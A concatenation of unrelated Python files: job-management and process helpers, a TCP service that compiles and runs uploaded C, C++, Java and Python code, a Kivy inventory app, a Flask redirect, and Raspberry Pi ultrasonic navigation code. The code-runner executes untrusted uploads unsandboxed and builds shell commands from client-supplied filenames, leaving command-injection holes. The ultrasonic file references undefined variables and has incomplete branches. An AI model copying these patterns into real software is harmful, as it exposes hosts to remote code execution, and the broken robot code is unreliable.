preprocessing, skipping" % job_id) unqueue_preprocessing_ids.append(job_id) else: launch_config = job_directory.load_metadata("launch_config") self._launch_prepreprocessing_thread(job_id, launch_config) for unqueue_preprocessing_id in unqueue_preprocessing_ids: self.active_job_directory.deactivate_job(unqueue_preprocessing_id, active_status=ACTIVE_STATUS_PREPROCESSING) recover_method = getattr(self._proxied_manager, "_recover_active_job", None) if recover_method is None: return for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_LAUNCHED): try: recover_method(job_id) except Exception: log.exception("Failed to recover active job %s" % job_id) self.__handle_recovery_problem(job_id) def __handle_recovery_problem(self, job_id): # Make sure we tell the client we have lost this job. self.active_jobs.deactivate_job(job_id) self.__state_change_callback(status.LOST, job_id) class ActiveJobs(object): """ Keeps track of active jobs (those that are not yet "complete"). Current implementation is file based, but could easily be made database-based instead. TODO: Keep jobs in memory after initial load so don't need to repeatedly hit disk to recover this information. """ @staticmethod def from_manager(manager): persistence_directory = manager.persistence_directory manager_name = manager.name return ActiveJobs(manager_name, persistence_directory) def __init__(self, manager_name, persistence_directory): if persistence_directory: active_job_directory = os.path.join(persistence_directory, "%s-active-jobs" % manager_name) if not os.path.exists(active_job_directory): os.makedirs(active_job_directory) preprocessing_job_directory = os.path.join(persistence_directory, "%s-preprocessing-jobs" % manager_name) if not os.path.exists(preprocessing_job_directory): os.makedirs(preprocessing_job_directory) else: active_job_directory = None preprocessing_job_directory = None self.launched_job_directory = active_job_directory self.preprocessing_job_directory = preprocessing_job_directory def active_job_ids(self, active_status=ACTIVE_STATUS_LAUNCHED): job_ids = [] target_directory = self._active_job_directory(active_status) if target_directory: job_ids = os.listdir(target_directory) return job_ids def activate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED): if self._active_job_directory(active_status): path = self._active_job_file(job_id, active_status=active_status) try: open(path, "w").close() except Exception: log.warn(ACTIVATE_FAILED_MESSAGE % job_id) def deactivate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED): if self._active_job_directory(active_status): path = self._active_job_file(job_id, active_status=active_status) if os.path.exists(path): try: os.remove(path) except Exception: log.warn(DECACTIVATE_FAILED_MESSAGE % job_id) def _active_job_directory(self, active_status): if active_status == ACTIVE_STATUS_LAUNCHED: target_directory = self.launched_job_directory elif active_status == ACTIVE_STATUS_PREPROCESSING: target_directory = self.preprocessing_job_directory else: raise Exception("Unknown active state encountered [%s]" % active_status) return target_directory def _active_job_file(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED): return os.path.join(self._active_job_directory(active_status), job_id) class ManagerMonitor(object): """ Monitors active jobs of a StatefulManagerProxy. """ def __init__(self, stateful_manager): self.stateful_manager = stateful_manager self.active = True thread = new_thread_for_manager(self.stateful_manager, "[action=monitor]", self._run, True) self.thread = thread def shutdown(self, timeout=None): self.active = False self.thread.join(timeout) if self.thread.isAlive(): log.warn("Failed to join monitor thread [%s]" % self.thread) def _run(self): """ Main loop, repeatedly checking active jobs of stateful manager. """ while self.active: try: self._monitor_active_jobs() except Exception: log.exception("Failure in stateful manager monitor step.") def _monitor_active_jobs(self): active_job_ids = self.stateful_manager.active_jobs.active_job_ids() iteration_start = datetime.datetime.now() for active_job_id in active_job_ids: try: self._check_active_job_status(active_job_id) except Exception: log.exception("Failed checking active job status for job_id %s" % active_job_id) iteration_end = datetime.datetime.now() iteration_length = iteration_end - iteration_start if iteration_length < self.stateful_manager.min_polling_interval: to_sleep = (self.stateful_manager.min_polling_interval - iteration_length) microseconds = to_sleep.microseconds + (to_sleep.seconds + to_sleep.days * 24 * 3600) * (10 ** 6) total_seconds = microseconds / (10 ** 6) time.sleep(total_seconds) def _check_active_job_status(self, active_job_id): # Manager itself will handle state transitions when status changes, # just need to poll get_status self.stateful_manager.get_status(active_job_id) def new_thread_for_job(manager, action, job_id, target, daemon): name = "[action=%s]-[job=%s]" % (action, job_id) return new_thread_for_manager(manager, name, target, daemon) def new_thread_for_manager(manager, name, target, daemon): thread_name = "[manager=%s]-%s" % (manager.name, name) thread = threading.Thread(name=thread_name, target=target) thread.daemon = daemon thread.start() return thread __all__ = ('StatefulManagerProxy',)
process.py
import atexit from datetime import timedelta import logging import os from queue import Queue as PyQueue import re import threading import weakref from .utils import mp_context from tornado import gen from tornado.concurrent import Future from tornado.ioloop import IOLoop logger = logging.getLogger(__name__) def _loop_add_callback(loop, func, *args): """ Helper to silence "IOLoop is closing" exception on IOLoop.add_callback. """ try: loop.add_callback(func, *args) except RuntimeError as exc: if not re.search("IOLoop is clos(ed|ing)", str(exc)): raise def _call_and_set_future(loop, future, func, *args, **kwargs): try: res = func(*args, **kwargs) except Exception as exc: # Tornado futures are not thread-safe, need to # set_result() / set_exc_info() from the loop's thread _loop_add_callback(loop, future.set_exception, exc) else: _loop_add_callback(loop, future.set_result, res) class _ProcessState(object): is_alive = False pid = None exitcode = None class AsyncProcess(object): """ A coroutine-compatible multiprocessing.Process-alike. All normally blocking methods are wrapped in Tornado coroutines. """ def __init__(self, loop=None, target=None, name=None, args=(), kwargs={}): if not callable(target): raise TypeError("`target` needs to be callable, not %r" % (type(target),)) self._state = _ProcessState() self._loop = loop or IOLoop.current(instance=False) # _keep_child_alive is the write side of a pipe, which, when it is # closed, causes the read side of the pipe to unblock for reading. Note # that it is never closed directly. The write side is closed by the # kernel when our process exits, or possibly by the garbage collector # closing the file descriptor when the last reference to # _keep_child_alive goes away. We can take advantage of this fact to # monitor from the child and exit when the parent goes away unexpectedly # (for example due to SIGKILL). This variable is otherwise unused except # for the assignment here. parent_alive_pipe, self._keep_child_alive = mp_context.Pipe(duplex=False) self._process = mp_context.Process( target=self._run, name=name, args=(target, args, kwargs, parent_alive_pipe, self._keep_child_alive), ) _dangling.add(self._process) self._name = self._process.name self._watch_q = PyQueue() self._exit_future = Future() self._exit_callback = None self._closed = False self._start_threads() def __repr__(self): return "<%s %s>" % (self.__class__.__name__, self._name) def _check_closed(self): if self._closed: raise ValueError("invalid operation on closed AsyncProcess") def _start_threads(self): self._watch_message_thread = threading.Thread( target=self._watch_message_queue, name="AsyncProcess %s watch message queue" % self.name, args=( weakref.ref(self), self._process, self._loop, self._state, self._watch_q, self._exit_future, ), ) self._watch_message_thread.daemon = True self._watch_message_thread.start() def stop_thread(q): q.put_nowait({"op": "stop"}) # We don't join the thread here as a finalizer can be called # asynchronously from anywhere self._finalizer = weakref.finalize(self, stop_thread, q=self._watch_q) self._finalizer.atexit = False def _on_exit(self, exitcode): # Called from the event loop when the child process exited self._process = None if self._exit_callback is not None: self._exit_callback(self) self._exit_future.set_result(exitcode) @classmethod def _immediate_exit_when_closed(cls, parent_alive_pipe): """ Immediately exit the process when parent_alive_pipe is closed. """ def monitor_parent(): try: # The parent_alive_pipe should be held open as long as the # parent is alive and wants us to stay alive. Nothing writes to # it, so the read will block indefinitely. parent_alive_pipe.recv() except EOFError: # Parent process went away unexpectedly. Exit immediately. Could # consider other exiting approches here. My initial preference # is to unconditionally and immediately exit. If we're in this # state it is possible that a "clean" process exit won't work # anyway - if, for example, the system is getting bogged down # due to the running out of memory, exiting sooner rather than # later might be needed to restore normal system function. # If this is in appropriate for your use case, please file a # bug. os._exit(-1) else: # If we get here, something odd is going on. File descriptors # got crossed? raise RuntimeError("unexpected state: should be unreachable") t = threading.Thread(target=monitor_parent) t.daemon = True t.start() @staticmethod def reset_logger_locks(): """ Python 2's logger's locks don't survive a fork event https://github.com/dask/distributed/issues/1491 """ for name in logging.Logger.manager.loggerDict.keys(): for handler in logging.getLogger(name).handlers: handler.createLock() @classmethod def _run(cls, target, args, kwargs, parent_alive_pipe, _keep_child_alive): # On Python 2 with the fork method, we inherit the _keep_child_alive fd, # whether it is passed or not. Therefore, pass it unconditionally and # close it here, so that there are no other references to the pipe lying # around. cls.reset_logger_locks() _keep_child_alive.close() # Child process entry point cls._immediate_exit_when_closed(parent_alive_pipe) threading.current_thread().name = "MainThread" target(*args, **kwargs) @classmethod def _watch_message_queue(cls, selfref, process, loop, state, q, exit_future): # As multiprocessing.Process is not thread-safe, we run all # blocking operations from this single loop and ship results # back to the caller when needed. r = repr(selfref()) name = selfref().name def _start(): process.start() thread = threading.Thread( target=AsyncProcess._watch_process, name="AsyncProcess %s watch process join" % name, args=(selfref, process, state, q), ) thread.daemon = True thread.start() state.is_alive = True state.pid = process.pid logger.debug("[%s] created process with pid %r" % (r, state.pid)) while True: msg = q.get() logger.debug("[%s] got message %r" % (r, msg)) op = msg["op"] if op == "start": _call_and_set_future(loop, msg["future"], _start) elif op == "terminate": _call_and_set_future(loop, msg["future"], process.terminate) elif op == "stop": break else: assert 0, msg @classmethod def _watch_process(cls, selfref, process, state, q): r = repr(selfref()) process.join() exitcode = process.exitcode assert exitcode is not None logger.debug("[%s] process %r exited with code %r", r, state.pid, exitcode) state.is_alive = False state.exitcode = exitcode # Make sure the process is removed from the global list # (see _children in multiprocessing/process.py) # Then notify the Process object self = selfref() # only keep self alive when required try: if self is not None: _loop_add_callback(self._loop, self._on_exit, exitcode) finally: self = None # lose reference def start(self): """ Start the child process. This method is a coroutine. """ self._check_closed() fut = Future() self._watch_q.put_nowait({"op": "start", "future": fut}) return fut def terminate(self): """ Terminate the child process. This method is a coroutine. """ self._check_closed() fut = Future() self._watch_q.put_nowait({"op": "terminate", "future": fut}) return fut @gen.coroutine def join(self, timeout=None): """ Wait for the child process to exit. This method is a coroutine. """ self._check_closed() assert self._state.pid is not None, "can only join a started process" if self._state.exitcode is not None: return if timeout is None: yield self._exit_future else: try: yield gen.with_timeout(timedelta(seconds=timeout), self._exit_future) except gen.TimeoutError: pass def close(self): """ Stop helper thread and release resources. This method returns immediately and does not ensure the child process has exited. """ if not self._closed: self._finalizer() self._process = None self._closed = True def set_exit_callback(self, func): """ Set a function to be called by the event loop when the process exits. The function is called with the AsyncProcess as sole argument. The function may be a coroutine function. """ # XXX should this be a property instead? assert callable(func), "exit callback should be callable" assert ( self._state.pid is None ), "cannot set exit callback when process already started" self._exit_callback = func def is_alive(self): return self._state.is_alive @property def pid(self): return self._state.pid @property def exitcode(self): return self._state.exitcode @property def name(self): return self._name @property def daemon(self): return self._process.daemon @daemon.setter def daemon(self, value): self._process.daemon = value _dangling = weakref.WeakSet() @atexit.register def _cleanup_dangling(): for proc in list(_dangling): if proc.is_alive(): try: logger.info("reaping stray process %s" % (proc,)) proc.terminate() except OSError: pass
server.py
from socketserver import * import os, json, struct,pprint import threading import pexpect test_home = "0.0.0.0" PORT = 8875 TEST_HOME = (test_home, PORT) base_dir = os.path.dirname((os.path.abspath(__file__))) DISPLAY = [] PARAMS = [] flag = 0 allowToReceiveArgs=False def compile(cmd): os.system(cmd) # 将用户的输入从列表取出传给控制台 def sendto_console(child): global PARAMS alreadySendFlag=False while True: if len(PARAMS)>0: print("already get the args") child.sendline(PARAMS.pop(0).encode('utf-8')) break else: if not alreadySendFlag: global allowToReceiveArgs allowToReceiveArgs=True # 开始接收参数 alreadySendFlag=True continue # 将控制台的输出保存到列表发给用户 def sendto_client(content): DISPLAY.append(str(content,encoding='utf-8')) # 调动解析器执行客户端的文件 def interact(cmd): global PARAMS PARAMS=[] print("running cmd: "+cmd) child = pexpect.spawn(cmd) child.setecho(False) child.timeout = 0.5 while True: print("try to run") try: child.expect('.+') if not child.isalive(): print("run cmd to the end") print(child.after.strip()) sendto_client(child.after.strip()) # 回送结果 global flag flag = 1 # 结束标志 break sendto_client(child.after) sendto_console(child) except: print("some exception happen while runnnig the cmd") sendto_console(child) # 主函数,根据文件类型调用相应解析器执行 def call(filename, filetype): if filetype == 'C': compile_c(filename) elif filetype == 'C++': compile_c_plus(filename) elif filetype == 'Java': compile_java(filename) elif filetype == 'python': compile_python(filename) elif filetype == 'python3': compile_python3(filename) def compile_python(filename): cmd = 'python ' + filename interact(cmd) def compile_python3(filename): cmd = 'python3 ' + filename interact(cmd) def compile_c(filename): os.system("rm -f app") cmd = 'gcc ' + filename + ' -o app -lm' os.system(cmd) cmd = 'bash -c "./app"' interact(cmd) def compile_c_plus(filename): os.system("rm -f app") cmd = 'g++ ' + filename + ' -o app' os.system(cmd) cmd = 'bash -c "./app"' interact(cmd) def compile_java(filename): cmd = 'javac ' + filename os.system(cmd) os.system("rm -f "+filename) file = filename[:-5] print(file) cmd = 'bash -c "java '+file+'"' interact(cmd) class MyRequestHandler(StreamRequestHandler): def feedback(self): # send to client while True: if not DISPLAY: #没有数据等待发送 continue self.request.send(DISPLAY.pop(0).encode('utf-8')) global flag if flag==1: break def paramReceive(self): # 获得来自客户端的参数信息,将将其作为字符串发给CMD while True: try: global flag if flag==1: # 判断程序是否结束 break global allowToReceiveArgs if not allowToReceiveArgs: # 只在需要输入的时候读取输入 continue print('wait to receive args from client') param = self.request.recv(1024).decode('utf-8') #接收参数 if not param: continue allowToReceiveArgs=False print('success to receive args from client') #pprint.pprint(param) PARAMS.append(param) #pprint.pprint(PARAMS) except: print('some exception happen while waiting to receive args from client') break def upload(self, hander): # 客户端上传文件,服务器接收 try: filesize = hander['filesize'] whole_data = b'' current_size = 0 while current_size < filesize: data = self.request.recv(1024) current_size = current_size + len(data) whole_data = whole_data + data filename = hander['filename'] i = 0 #print(whole_data) while True: if os.path.exists(filename): # 该文件存在则不停在后缀前+1直至不存在 filename_list = filename.rsplit(".", maxsplit=1) filename = filename_list[0] + str(i) + "." + filename_list[1] i = i + 1 else: f = open(filename, "w", encoding="utf-8") f.write(str(whole_data,encoding='utf-8')) f.close() return filename except: return "" def handle(self):# 定义处理方法 一开始等待对方发送数据包, try: while True: global flag global PARAMS global allowToReceiveArgs allowToReceiveArgs=False flag = 0 PARAMS = [] json_length = self.request.recv(4) # 对方发送的json_hander数据包长度,为int型变量,为json型,其中包含flag和文件名称,文件大小 json_hander=b'' while len(json_hander)<struct.unpack('i', json_length)[0]: info = self.request.recv(struct.unpack('i', json_length)[0]) # 收到json型的hander json_hander的是结构化的json_hander,它的[0]是json_hander的长度 json_hander+=info hander = json.loads(json_hander.decode("utf-8")) order = hander['order'] # hander = {'order': 'upload', 'filename': 'notepad.cpp', 'filesize': 60, "language": "C"}(例如) if order == 'upload': result = self.upload(hander) if not result: print("fail to get the source file name") return False t1 = threading.Thread(target=self.feedback) # 回送消息线程 t2 = threading.Thread(target=self.paramReceive) # 接收消息线程 t1.start() t2.start() call(result, hander['language']) os.system("rm -f "+result) t1.join() print("program come to the end.") self.request.shutdown() except: return 0 if __name__ == '__main__': server = ThreadingTCPServer(TEST_HOME, MyRequestHandler) server.serve_forever()
main.py
import os import threading import openpyxl import kivy from kivy.app import App from kivy.uix.label import Label from kivy.uix.textinput import TextInput from kivy.uix.button import Button from kivy.uix.floatlayout import FloatLayout from kivy.uix.popup import Popup from kivy.properties import ObjectProperty from kivy.core.window import Window import excel import onedrive CONF_FILE = "TecMartz.conf" NUMERO_DISENOS = 0 PATH_EXCEL = "" URL_EXCEL = "" MODELOS = {} class PopupResult(Popup): lblResult = ObjectProperty() def __init__(self, result, busqueda, **kwargs): super(Popup, self).__init__(**kwargs) self.lblResult.text = result self.title += " \"" + busqueda + "\"" class PopupConf(Popup): txtNumDisenos = ObjectProperty() txtLocalExcel = ObjectProperty() txtRemoteExcel = ObjectProperty() def __init__(self, **kwargs): super(Popup, self).__init__(**kwargs) self.txtNumDisenos.text = str(NUMERO_DISENOS) self.txtLocalExcel.text = PATH_EXCEL self.txtRemoteExcel.text = URL_EXCEL def on_dismiss(self): global NUMERO_DISENOS, PATH_EXCEL, URL_EXCEL if NUMERO_DISENOS != int(self.txtNumDisenos.text) \ or PATH_EXCEL != self.txtLocalExcel.text \ or URL_EXCEL != self.txtRemoteExcel.text: #print("saved") """ print(NUMERO_DISENOS, self.txtNumDisenos.text) print(PATH_EXCEL, self.txtLocalExcel.text) print(URL_EXCEL,self.txtRemoteExcel.text) """ NUMERO_DISENOS = int(self.txtNumDisenos.text) PATH_EXCEL = self.txtLocalExcel.text URL_EXCEL = self.txtRemoteExcel.text f = open(CONF_FILE, "w") f.write("\n".join([str(NUMERO_DISENOS), PATH_EXCEL, URL_EXCEL]) + "\n") f.close() class MyGrid(FloatLayout): txtModelo = ObjectProperty() lblEstado = ObjectProperty() btnUpdate = ObjectProperty() btnSearch = ObjectProperty() def inicializar_globales(self): global NUMERO_DISENOS, PATH_EXCEL, URL_EXCEL if os.path.isfile(CONF_FILE): #print("Loading from file") f = open(CONF_FILE, "r") d = f.readlines() f.close() NUMERO_DISENOS = int(d[0][:-1]) PATH_EXCEL = d[1][:-1] URL_EXCEL = d[2] else: #print("No conf file found") NUMERO_DISENOS = 8 PATH_EXCEL = "Existencias actual 070719.xlsx" URL_EXCEL = "" #CENSORED f = open(CONF_FILE, "w") f.write("\n".join([str(NUMERO_DISENOS), PATH_EXCEL, URL_EXCEL]) + "\n") f.close() def descargar_y_leer_excel(self, force_download=False): self.btnUpdate.disabled = True global MODELOS if not os.path.isfile(PATH_EXCEL) or force_download: self.lblEstado.text = "Descargando excel..." try: onedrive.download_excel(URL_EXCEL, PATH_EXCEL) except Exception as err: self.lblEstado.text = "Error descargando excel: " + str(err.__repr__()) self.btnUpdate.disabled = False return self.lblEstado.text = "Leyendo excel..." try: MODELOS, errores = excel.get_modelos(PATH_EXCEL, NUMERO_DISENOS) self.lblEstado.text = "\n".join(errores) + "\n\nListo" except Exception as err: self.lblEstado.text = "Error leyendo excel: " + str(err.__repr__()) self.btnUpdate.disabled = False return self.btnUpdate.disabled = False def btnSearch_onclick(self): threading.Thread(target=self._btnSearch_onclick).start() def btnUpdate_onclick(self): threading.Thread(target=self._btnUpdate_onclick).start() def btnConf_onclick(self): popup = PopupConf() popup.open() def _btnUpdate_onclick(self): self.descargar_y_leer_excel(True) def _btnSearch_onclick(self): #print("Leyendo excel...") busqueda = self.txtModelo.text if not busqueda: self.lblEstado.text = "Por favor introduzca el modelo a buscar." return self.btnSearch.disabled = True self.lblEstado.text = "Realizando la búsqueda..." try: result = excel.buscar_modelos(MODELOS, busqueda) except Exception as err: self.lblEstado.text = "Error buscando el modelo: " + str(err.__repr__()) self.btnSearch.disabled = False return result_str = excel.sprint_modelos(result) popup_msg = result_str if result_str else "No se ha encontrado ningún modelo." popup = PopupResult(popup_msg, busqueda) popup.open() self.lblEstado.text = "Listo" self.btnSearch.disabled = False class MyApp(App): def build(self): self.title = "Klecko fucking boss" #Window.size = (360, 640) Window.clearcolor = (1,1,1,1) return MyGrid() def on_start(self): self.root.inicializar_globales() self.root.descargar_y_leer_excel() if __name__ == '__main__': MyApp().run()
keep_alive.py
from flask import Flask from threading import Thread app = Flask('') @app.route('/') def main(): return '<meta http-equiv="refresh" content="0; URL=https://phantom.codes/credits"/>' def run(): app.run(host="0.0.0.0", port=8080) def keep_alive(): server = Thread(target=run) server.start()
ultrasonic_hcsr04.py
# --------------------------------------------------------------------------- # # Title: Ultrasonic measure and interpretation script # Author: Arthur Telles, Eduardo Brizida, Balthazar Paixao # Date: 01/07/2018 (DD/MM/YYYY) # Description: # --------------------------------------------------------------------------- # import sys import time import signal import RPi.GPIO as GPIO from multiprocessing import Process import numpy as np from lib.MotorAtual import Motor as motor #Usar apenas essa biblioteca para ultrassônicos class Ultrassom(): def __init__(self): #esquerda self.trigA = 13 self.echoA = 27 #centro esquerda self.trigB = 19 self.echoB = 22 #centro direita self.trigC = 6 self.echoC = 17 #direita self.trigD = 4 self.echoD = 20 self.tempo = time.time() GPIO.setup(trigA,GPIO.OUT) GPIO.setup(echoA,GPIO.IN) GPIO.setup(trigB,GPIO.OUT) GPIO.setup(echoB,GPIO.IN) GPIO.setup(trigC,GPIO.OUT) GPIO.setup(echoC,GPIO.IN) GPIO.setup(trigD,GPIO.OUT) GPIO.setup(echoD,GPIO.IN) sampling_rate = 20.0 speed_of_sound = 349.10 max_distance = 4.0 max_delta_t = max_distance / speed_of_sound def sigint_handler(signum, instant): clean() # Ativar a captura do sinal SIGINT (Ctrl-C) signal.signal(signal.SIGINT, sigint_handler) # Variáveis para auxiliar no controle do loop principal # sampling_rate: taxa de amostragem em Hz, isto é, em média, # quantas leituras do sonar serão feitas por segundo # speed_of_sound: velocidade do som no ar a 30ºC em m/s # max_distance: máxima distância permitida para medição # max_delta_t: um valor máximo para a variável delta_t, # baseado na distância máxima max_distance # Inicializa TRIG em nível lógico baixo GPIO.output(trigA,False) GPIO.output(trigB,False) GPIO.output(trigC,False) GPIO.output(trigD,False) def leitura(self): vA = []; vB = []; vC = []; vD = [] for i in range(0,5): GPIO.output(self.trigA,True) time.sleep(0.00001) GPIO.output(self.trigA,False) while GPIO.input(self.echoA) == 0: start_tA = time.time() while (GPIO.input(self.echoA) == 1 and time.time() - start_tA < self.max_delta_t): end_tA = time.time() GPIO.output(self.trigB,True) time.sleep(0.00001) GPIO.output(self.trigB,False) while GPIO.input(self.echoB) == 0: start_tB = time.time() while (GPIO.input(self.echoB) == 1 and time.time() - start_tB < self.max_delta_t): end_tB = time.time() GPIO.output(self.trigC,True) time.sleep(0.00001) GPIO.output(self.trigC,False) while GPIO.input(self.echoC) == 0: start_tC = time.time() while (GPIO.input(self.echoC) == 1 and time.time() - start_tC < self.max_delta_t): end_tC = time.time() GPIO.output(self.trigD,True) time.sleep(0.00001) GPIO.output(self.trigD,False) while GPIO.input(self.echoD) == 0: start_tD = time.time() while (GPIO.input(self.echoD) == 1 and time.time() - start_tD < self.max_delta_t): end_tD = time.time() # Se a diferença entre end_t e start_t estiver dentro dos limites impostos, # atualizamos a variável delta_t e calculamos a distância até um obstáculo. # Caso o valor de delta_t não esteja nos limites determinados definimos a # distância como -1, sinalizando uma medida mal-sucedida. if end_tA - start_tA < max_delta_t: delta_tA = end_tA - start_tA distanceA = 100*(0.5 * delta_tA * speed_of_sound) else: distanceA = -1 if end_tB - start_tB < max_delta_t: delta_tB = end_tB - start_tB distanceB = 100*(0.5 * delta_tB * speed_of_sound) else: distanceB = -1 if end_tC - start_tC < max_delta_t: delta_tC = end_tC - start_tC distanceC = 100*(0.5 * delta_tC * speed_of_sound) else: distanceC = -1 if end_tD - start_tD < max_delta_t: delta_tD = end_tD - start_tD distanceD = 100*(0.5 * delta_tD * speed_of_sound) else: distanceD = -1 vA.append(distanceA) vB.append(distanceB) vC.append(distanceC) vD.append(distanceD) mA = np.median(vA) mB = np.median(vB) mC = np.median(vC) mD = np.median(vD) DiferentialBC = mB - mC #print(str(tpp - time()) + " seconds") #metricA e metricB tem que retornar valores muito grandes sempre, #quando eles retornarem algo menor que 300cm MAIS DE 3 VEZES, #isso e um obstaculo e precisamos escapar dele. Se #essa medida diminuir, estamos nos aproximando do obstaculo e precismos #desviar dele mais rapido ainda, usar a logica de blocos no #drive "logistica trekking". Quanto mais proximo mais rapido se desvia # trabalhar com casos de leitura confiavel em 2 ultras, e em 1 ultra #logicas diferentes pro da esquerda e direita e pros dois centrais # em 1 ultrassom, viramos mais rapido para que outro detecte, só podemos # nos alinhar direito quando 2 detectarem def navegacao(self): self.leituras() while (mA <= 180): # tem obstaculo na esquerda angulo1 = 15;angulo2 = 20;angulo3 = 25;angulo4 = 30;angulo5 = 35;angulo5 = 40 self.controle.posicionar(angulo1,50) vel = motor.MudarVelocidade(40,80) if (mA <= 150): self.controle.posicionar(angulo4,50) vel = motor.MudarVelocidade(40,80) #diminuir velocidade if (mB <= 180 and mC <= 180): #objeto grande, desviar #importar curvas no código e chamar nesse momento self.controle.posicionar(angulo3,70) # confirmar angulo e forca vel = motor.MudarVelocidade(40,80) #diminuir velocidade if (mB <= 150 and mC <= 150): self.controle.posicionar(angulo5,80) vel = motor.MudarVelocidade(30,80) #diminuir velocidade mais ainda elif (mB <= 180): #objeto menor, virar mais lento self.controle.posicionar(angulo2,60) # confirmar angulo e forca vel = motor.MudarVelocidade(40,80) if (mB <= 150): self.controle.posicionar(angulo3,50) vel = motor.MudarVelocidade(30,80) #diminuir velocidade if (mB > 180 and mC > 180): #obstaculo nao e mais visto pela centro esquerda e centro direita self.controle.posicionar(0,50) vel = motor.MudarVelocidade(60, 80) while (mD <= 180): #repetir logica de rawA <= 180 # tem obstaculo na direita angulo1 = -15;angulo2 = -20;angulo3 = -25;angulo4 = -30;angulo5 = -35 self.controle.posicionar(angulo1,50) vel = motor.MudarVelocidade(40,80) if (mD <= 150): self.controle.posicionar(angulo4,50) vel = motor.MudarVelocidade(30,80) #diminuir velocidade if (mB <= 180 and mC <= 180): #objeto grande, desviar #importar curvas no código e chamar nesse momento self.controle.posicionar(angulo3,70) # confirmar angulo e forca vel = motor.MudarVelocidade(40,80) #diminuir velocidade if (mB <= 150 and mC <= 150): self.controle.posicionar(angulo5,80) vel = motor.MudarVelocidade(30,80) #diminuir velocidade mais ainda elif (mB <= 180): #objeto menor, virar mais lento self.controle.posicionar(angulo2,60) # confirmar angulo e forca vel = motor.MudarVelocidade(40,80) if (mB <= 150): self.controle.posicionar(angulo3,50) vel = motor.MudarVelocidade(30,80) #diminuir velocidade if (mB > 180 and mC > 180): #obstaculo nao e mais visto pela centro esquerda e centro direita self.controle.posicionar(0,50) vel = motor.MudarVelocidade(60,80) return mA,mB,mC,mD #esse modo sera implementado na logica de controle, nao aqui def callback(self): print("Entramos em callback, regenerando navegacao") mA,mB,mC,mD = a.navegacao(5,0.1) time.sleep(1/20) return mA,mB,mC,mD def localizacao(self): self.leituras() #Se chegamos nessa funcao, significa que imagens ja confirmou que e #um cone e estamos tao proximo que imagens deixa de ser confiavel. #Entao precisamos fazer ajustes finos aqui, chamando o motor e o servo. #Apos encostar nele, vamos ter que acionar a sirene e usar #a ponte H em marcha ré, mas precisamos definir como isso vai ser feito # trabalhar com casos de leitura confiavel em 2 ultras, e em 1 ultra #logicas diferentes pro da esquerda e direita e pros dois centrais # em 1 ultrassom, viramos mais rapido para que outro detecte, só podemos # nos alinhar direito quando 2 detectarem dist_min = min([mA,mB,mC,mD]) while (dist_min > 5): minimo = min([mA, mB, mC, mD]) # ----------------------------- # USAR Y = 0.434X - 3.478 # posicao = minimo * 0.434 - 3.478 # servo.posicionar(posicao,50) # arbitrar a forca # ----------------------------- angulo1 = 5;angulo2 = 10;angulo3 = 15;angulo4 = 20;angulo5 = 30 if minimo < 100: vel = motor.MudarVelocidade(30,80) #diminuir velocidade 20% if minimo == mA: while ((minimo != mB) or (minimo != mC)): #Cone mais próximo da esquerda servo.posicionar(angulo4, 50) vel = motor.MudarVelocidade(15,80) #motor a 15% #if minimo == mD: #break minimo = min([mA,mB,mC,mD]) #elif minimo == mB: #Cone mais próximo do centro esquerda # servo.posicionar(angulo2, 50) #motor a 20% elif minimo == mC or minimo == mB: ServoAng = 0.22 * DiferentialBC if (ServoAng >= 45): ServoAng = 45 if (ServoAng <= -45): ServoAng = -45 #Cone mais proximo do centro direita #angulo1 = -15;angulo2 = -20;angulo3 = -25;angulo4 = -30;angulo5 = -35 servo.posicionar(ServoAng, 50) vel = motor.MudarVelocidade(20,80) #motor a 20% #if minimo == mA: # break minimo = min([mA,mB,mC,mD]) elif minimo < 50: #diminuir mais velocidade 10% #repete a logica acima virando mais com a mesma velocidade de motor if minimo == rawA: #Cone mais próximo da esquerda self.posicionar(angulo3, 50) vel = motor.MudarVelocidade(20,80) #motor a 5% elif minimo == rawB: #Cone mais próximo do centro esquerda self.posicionar(angulo1, 50) vel = motor.MudarVelocidade(20,80) #motor a 10% elif minimo == rawC: #Cone mais proximo do centro direita self.posicionar(angulo1, 50) vel = motor.MudarVelocidade(20,80) #motor a 10% elif minimo == rawD: #Cone mais propximo da direita self.posicionar(angulo3, 50) vel = motor.MudarVelocidade(15,80) #motor a 5% elif minimo < 20: motor.StopMotor() sirene() #diminuir mais velocidade 5% #repete a logica acima virando mais, porem em uma velocidade de motor mais lenta # if minimo == rawA: #Cone mais próximo da esquerda # self.posicionar(angulo1, 30) #motor a 10% # elif minimo == rawB: #Cone mais próximo do centro esquerda # self.posicionar(3, 20) #motor a 15% #elif minimo == rawC: #Cone mais proximo do centro direita #angulo1 = -15;angulo2 = -20;angulo3 = -25;angulo4 = -30;angulo5 = -35 # self.posicionar(3, 20) #motor a 15% # elif minimo == rawD: #Cone mais propximo da direita #angulo1 = -15;angulo2 = -20;angulo3 = -25;angulo4 = -30;angulo5 = -35 # self.posicionar(angulo1, 30) #motor a 10% #elif minimo <= 8: #sirene #motor da ré e direcionar o servo para o proximo cone dist_min = min([mA,mB,mC,mD]) while (dist_min < 40): print("Entramos no modo de saida do cone") if cone_um == True: while ((time.time() - tempo) < 3): self.posicionar(-angulo5,70) motor.MarchaRe() motor.MudarVelocidade(40, 50) motor.StopMotor() ###Voltar com imagens # while ((time.time() - tempo) < 3): # self.posicionar(angulo5,70) # motor.VelocidadePositiva() # motor.MudarVelocidade(30, 80) #while ((time.time() - tempo) < 2): # self.posicionar(0,20) elif cone_dois == True: while ((time.time() - tempo) < 5): self.posicionar(0,70) motor.MarchaRe() motor.MudarVelocidade(40, 90) motor.StopMotor() while ((time.time() - tempo) < 2): self.posicionar(angulo5,70) motor.VelocidadePositiva() motor.MudarVelocidade(60, 80) self.posicionar() ##Voltar com imagens elif cone_tres == True: #Somente checar com imagens #dar marcha ré a 15% e pegar angulo de saida do proximo cone ## except: ## a.callback() #deu xabu, chamando novamente navegacao ## dist_min = min([metricB,metricC]) return mA,mB,mC,mD ### Exemplo de uso #a = Ultrassom(19,22,13,27) # #metricA,metricB = a.navegacao(1,0.005) # ###a ##ultraA_read() ##def UltraDiferencial(): ## while (True): ## ## Diferencial = Ue - Ud ## ## print(Diferencial) ##readings = [] ##readings.append(Process(target=ultraA_read)) ##for reading in readings: ## reading.start() ## print(reading)
testresult.py
